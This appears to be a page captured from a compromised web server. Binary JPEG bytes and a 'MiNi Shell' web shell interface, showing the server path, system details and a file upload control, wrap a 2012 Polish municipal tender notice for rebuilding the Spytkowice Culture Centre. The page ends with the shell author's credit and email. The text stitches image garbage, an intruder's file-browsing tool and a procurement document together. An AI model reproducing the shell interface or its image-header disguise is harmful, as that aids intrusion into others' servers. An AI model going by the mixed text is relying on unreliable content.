JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120209/39096-N-2012.html

<p class="kh_header"><b>Spytkowice: Przebudowa i rozbudowa istniejącego budynku na potrzeby Centrum Kultury w Spytkowicach</b><br>
<b>Numer ogłoszenia: 39096 - 2012; data zamieszczenia: 09.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Spytkowice , Spytkowice 26, 34-745 Spytkowice, woj. małopolskie, tel. 018 2688370, faks 018 2688961.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spytkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i rozbudowa istniejącego budynku na potrzeby Centrum Kultury w Spytkowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budynek Centrum Kultury - przebudowa i rozbudowa istniejącego budynku usługowego, położonego  na działce nr 6przez7 i 6przez 4 w Spytkowicach. 
Dokumentacja Projekt architektoniczno- budowlany,
Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych
Przedmiary robót
 branża budowlana, branża elektryczna, branża instalacyjna.
Przedmiary robót stanowią materiał pomocniczy i nie mogą stanowić podstawy obliczenia ceny oferty.
Wszelkie znaki towarowe jakie mogą pojawić się w przedmiarach robót bądź projekcie mają charakter tylko i wyłącznie przykładowy. Zamawiający dopuszcza użycie materiałów równoważnych.

1.2.	Forma architektoniczna budynku:

Obiekt stanowi zwartą bryłę, z dwuspadowym dachem. Projektowany budynek jest obiektem nie podpiwniczonym z  kondygnacją użytkową na parterze oraz na piętrze. Rzut projektowanego budynku oparty jest na rzutach  prostokątów. Wejścia do projektowanego budynku usytuowano od strony wschodniej. Materiały wykończeniowe elewacji  wykonane są  w oparciu o technologie współczesne. Przewiduje się kolorystykę elewacji w tonacjach organicznych, drewno w kolorze naturalnym.
1.3.  Dane ogólne
Program użytkowy budynku.
Projekt przewiduje adaptacje pomieszczeń budynku na potrzeby Centrum Kultury w Spytkowicach.
Projektuje się następujące pomieszczenia:
Na parterze znajduje się
pom. techniczne, pom. socjalne, biblioteka, magazyn, sala komputerowa, schowek,       kotłownia, pom. porządkowe, WC męskie, WC damskie, WC dla niepełnosprawnych, komunikacja, wiatrołap.
Na piętrze znajduje się:
Komunikacja klatka, schodowa, istniejące pomieszczenia Związku Podhalan: świetlica,  przedsionek, WC, pom. pomocnicze, dwie sale wielofunkcyjne, oraz proj. sala zebrań w części nadbudowanej.

Dane techniczne

     Po przebudowie  	                  Stan istniejący
Wysokość budynku 		          	  9.78 m    	    	        9.78 m     
Szerokość budynku		            	11.43 m   		        11.43 m   
Długość budynku			          	19.45 m      	      	19.45 m      
Powierzchnia zabudowy 		       231,0 m2      	        220,0 m2          
Powierzchnia użytkowa		                373.1 m2   		        286,6 m2
Kubatura			           	       1616.8 m3      	        1355.1 m3      

ROZWIĄZANIA ARCHITEKTONICZNO  BUDOWLANE
Obiekt składa się z budynku zasadniczego oraz dobudówki. Budynek zasadniczy piętrowy, bez podpiwniczenia z nieużytkowym poddaszem. Kondygnacja poddasza nieużytkowa. Dobudówka również piętrowa, bez podpiwniczenia z nieużytkowym poddaszem. Wymiary całego budynku po przebudowie  19,45 m na 11,43 m. Budynek wykonany w technologii tradycyjnej. Układ nośny budynku  konstrukcja nośna ścianowa z mieszanym układem konstrukcyjnym.
Dach dwuspadowy o konstrukcji drewnianej krokwiowo-płatwiowej i płatwiowo-kleszczowy pokryty blachą fałdową o nachyleniu połaci 20,63 stopni.
Podstawowe elementy nośne obliczone jako belki jedno i wieloprzęsłowe, oraz układy ram płaskich i przestrzennych

ZMIANY ADAPTACYJNE W CZĘŚCI ISTNIEJĄCEJ
 Projekt przewiduje wykonanie otworów okiennych i drzwiowych w ścianach zewnętrznych i wewnętrznych, z częściowym wykorzystaniem istniejących nadproży, oraz poprzez założenie nowych nadproży żelbetowych nad pozostałymi otworami.
Wszystkie zamurowania pokazane na rysunku wykonać z pustaków PGS gr. 24 cm. na zaprawie cem.  wap.
 Podział pomieszczeń projektuje się ściankami działowymi wg rysunku rzutu parteru, jako murowane z cegły K3 gr 12 cm.
 Wymianę  drewnianego stropu nad I piętrem budynku zasadniczym.
 Ocieplenie ścian zewnętrznych oraz stropu nad I piętrem.
 Wykonanie prac wykończeniowych  malowanie, wykonanie podług itd.

CZĘŚĆ PROJEKTOWANA  DOBUDÓWKA:
 Przebudowa ściany północnej i wschodniej wraz z fundamentami  w części dobudowywanej do budynku zasadniczego  w istniejącym obrysie budynku ze względu na zły stan techniczny.
 Wykonanie stropu żelbetowego nad parterem 
 Wykonanie ścian pietra  wraz ze stropem.
 Wykonanie nowego dachu nad częścią dobudowaną  w kształcie i formie identycznej jak dach nad częścią zasadnicza tego budynku.
- Dobudowa wiatrołapu  oraz platformy dla osób niepełnosprawnych.

PROJEKTOWANE ELEMENTY KONSTRUKCYJNE
Dach - Nad dobudówką dach dwuspadowy o konstrukcji drewnianej, płatwiowo, kleszczowy, przekroje elementów podano w obliczeniach statycznych i na rysunkach architektonicznych. Wzmocnienie istniejącej konstrukcji dachu budynku głównego - projektuje się wzmocnienie istniejącej konstrukcji dachu poprzez wstawienie dodatkowych ścianek stolcowych, oraz jętek. Istniejące słupy należy usztywnić poprzez wstawienie mieczy.
Uwaga : W poziomie murłat wykonać wieńce żelbetowe wysokości 25 cm zbrojone prętami żebrowanymi 12 ze stali AIII, ze strzemionami  6 co 30 cm . W wieńcach należy osadzić śruby M16 do mocowania murłat w rozstawie co 1.5m
Stropy   nad parterem i I piętrem dobudówki żelbetowy, monolityczny, jednokierunkowo zbrojony z betonu C16 łamane 20, zbrojone stalą AIII. 
Nad I piętrem budynku głównego projektowany nowy strop drewniany, belkowy
Belki i podciągi żelbetowe, z betonu C16/20, zbrojone stalą klasy AIII. Wymiary
elementów podano w obliczeniach statycznych i na rysunkach konstrukcyjnych.
Nad otworami okiennymi i drzwiowymi zaprojektowano nadproża żelbetowe z betonu C16/20, zbrojone stalą klasy AIII, Wymiary elementów podano w obliczeniach statycznych i na rysunkach konstrukcyjnych.
Słupy: żelbetowe, z betonu C16 łamane 20, zbrojone stalą klasy AIII. Wymiary elementów podano w obliczeniach statycznych i na rysunkach konstrukcyjnych.
Ściany fundamentowe: betonowe z betonu C1 6łamane 20, zbrojone prętami żebrowanymi10 co 25 cm w obydwu kierunkach
Ściany zewnętrzne nośne: z pustaków Max klasy 15,  na zaprawie cementowo wapiennej klasy M5 
Ławy fundamentowe żelbetowe - z betonu C16 łamane 20, zbrojone prętami 4 fi 12 ze stali AIII, ze strzemionami  6 co 25 cm 
Uwaga: Projektowane fundamenty dobudówki połączyć z fundamentami istniejącymi za pomocą prętów zbrojeniowych wklejanych za pomocą zaprawy iniekcyjnej HIT-HY 150. Projektuje się podbicie części istniejących ław fundamentowych. Podbicie należy wykonać z betonu C16 łamane 20.

POSADZKI
Posadzki należy wykonać płytek ceramicznych lub jako biała podłoga wg. rysunków architektonicznych.

TYNKI ZEWNĘTRZNE
Tynk akrylowy lub mineralny na siatce z tworzywa sztucznego i kleju

TYNKI WEWNĘTRZNE
Cementowo wapienne kt. III lub gipsowe nakładane mechanicznie.

POKRYCIE DACHU
blacha tłoczona, trapezowa w kolorze czerwonym.

OBRÓBKI BLACHARSKIE
Obróbki blacharskie z blachy powlekanej gr. 0.5 mm 
Rynny i rury spustowe metalowe

STOLARKA DRZWIOWA I OKIENNA
 Stolarka okienna
Projekt przewiduje zastosowanie okien PCV lub drewnianych oraz  okien metalowych o odporności ogniowej EI-30 w  ścianach ogniowych.
Stolarka drzwiowa:
Drzwi wejściowe z PCV lub drewniane - wymiar w świetle muru: 150 na 210 cm.
Drzwi wewnętrzne - płycinowe - typowe.

IZOLACJE
Ściany zewnętrzne izolować styropianem gr. 12 cm, zarówno w części istniejącej jak i dobudowanej. 
Nad piętrem wykonać izolację cieplną stropu ze wełny mineralnej gr. 20 cm.        
Posadzkę w części istniejącej ocieplić styropianem gr. 4 cm.
Izolację przeciwwilgociową  1 x papa termozgrzewalna gr. 1 cm.

MALOWANIE I POWŁOKI ZABEZPIECZAJĄCE
malowanie ścian wewnętrznych - farby emulsyjne lub akrylowe w kolorach półpełnych,
malowanie ścian zewnętrznych - farba akrylowa 
cokół - tynk mozaikowy.
Impregnacja drewna konstrukcyjnego uodpornienie na działanie ognia, grzybów i  owadów  środkami nie toksycznymi, dopuszczonymi do stosowania w pomieszczeniach przeznaczonych na stały pobyt ludzi.

Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa, przedmiar robót i specyfikacja techniczna wykonania i odbioru robót. Dokumentacja ta jest załącznikiem do ogłoszenia o przetargu i jest dostępna na stronie internetowej zamawiającego. W przypadku, gdyby Wykonawca nie posiadał dostępu do internetu,  musi to zgłosić zamawiającemu. W takiej sytuacji  powyższa  dokumentacja będzie udostępniana wypożyczana Wykonawcom w celu sporządzenia oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.21.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający przewiduje wniesienie wadium w wysokości 10 000,- zł słownie złotych: dziesięć tysięcy.
10.2. Wadium może być wnoszone w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości tekst jedn.: Dz. U. z 2007 r. Nr 42, poz. 275 z pózn. zm..
10.3. Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Rabie Wyżnej nr rach.: 35 88 150002 0000 0000 9364 0017
Za datę wniesienia wadium w pieniądzu uznaje sie datę wpływu pieniędzy na rachunek
bankowy Zamawiającego.
10.4. Pozostałe formy wadium wymienione w pkt. 10.2. wymagają złożenia odpowiednich dokumentów w Kasie Urzędu Gminy Spytkowice, 34-745 Spytkowice 26 do dnia 24.02.2012 r. do godz. 10.00.
10.5. Wadium wniesione w formie poręczeń lub gwarancji musi zawierać zobowiązanie gwaranta lub poręczyciela do bezwarunkowej zapłaty Zamawiającemu pełnej kwoty wadium na każde jego żądanie w terminie związania ofertą w przypadkach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, wobec których brak jest podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy - Prawo zamówień publicznych oraz spełniający warunki określone w art. 22 ust. 1 tej ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że wykonał w okresie ostatnich 5 lat przed upływem terminu
składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, co najmniej dwóch robót montażowych, polegających na wykonaniu remontu instalacji elektrycznych oraz prac budowlanych o wartości co najmniej 300 tys. zł brutto każda, z potwierdzeniem,  że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
W przypadku Wykonawców wspólnie ubiegających sie o udzielenie zamówienia, powyższy warunek mogą spełniać Wykonawcy łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, iż osoby skierowane do realizacji przedmiotu zamówienia legitymują się:
1) uprawnieniami budowlanymi do kierowania robotami ogólnobudowlanymi
2) świadectwem kwalifikacyjnym w zakresie eksploatacji urządzeń elektrycznych o napięciu
znamionowym do 1 kV - co najmniej 2 osoby (monterzy).
W przypadku Wykonawców wspólnie ubiegających sie o udzielenie zamówienia, powyższy warunek mogą spełniać Wykonawcy łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że jest ubezpieczony od odpowiedzialności cywilnej za szkody rzeczowe i osobowe wyrządzone osobie trzeciej w zakresie prowadzonej działalności gospodarczej na terenie Rzeczypospolitej Polskiej.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, powyższy warunek powinien spełniać każdy Wykonawca.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wykaz wykonanych robót z podaniem dat i miejsca ich wykonania wraz z dokumentami
potwierdzającymi ich wykonanie zgodnie z zasadami sztuki budowlanej i prawidłowe ich
ukończenie - na potwierdzenie warunku opisanego w pkt 2.1. - załącznik nr 2 do oferty,
 wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat zakresu czynności wykonywanych przez nich przy realizacji zamówienia, ich kwalifikacji zawodowych, uprawnień, podstawie do dysponowania tymi osobami wraz z oświadczeniem o posiadaniu przez te osoby wymaganych przez Zamawiającego uprawnień i kwalifikacji - na potwierdzenie warunku opisanego w punkcie 2.2. - załącznik nr 3 do oferty,
 wykaz części zamówienia, których wykonanie Wykonawca zamierza powierzyć podwykonawcom (należy załączyć w przypadku powierzenia realizacji części zamówienia podwykonawcom) - załącznik nr 4 do oferty,
 informacje o zastosowaniu urządzeń i materiałów równoważnych do opisywanych w Rozdziale II  SIWZ wraz z dokumentami potwierdzającymi równoważność tych rozwiązań (należy załączyć w przypadku zastosowania materiałów równoważnych) - załącznik nr 5 do oferty,
 opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej za szkody rzeczowe i osobowe wyrządzone osobie trzeciej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia - na potwierdzenie warunku opisanego w pkt 2.3.
Jeżeli z przedstawionego dokumentu nie będzie wynikało, że ubezpieczenie jest opłacone,
Wykonawca powinien dołączyć dokument potwierdzający opłacenie składki ubezpieczeniowej (np. kopie przelewu).
 Złożone oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu nie później niż w dniu, w którym upływa termin składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spytkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Spytkowice
34-745 Spytkowice 26
pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2012 godzina 10:00, miejsce: Urząd Gminy Spytkowice
34-745 Spytkowice 26
pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROW na lata 2007-2013, działanie 313, 322, 323 Odnowa i rozwój wsi..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com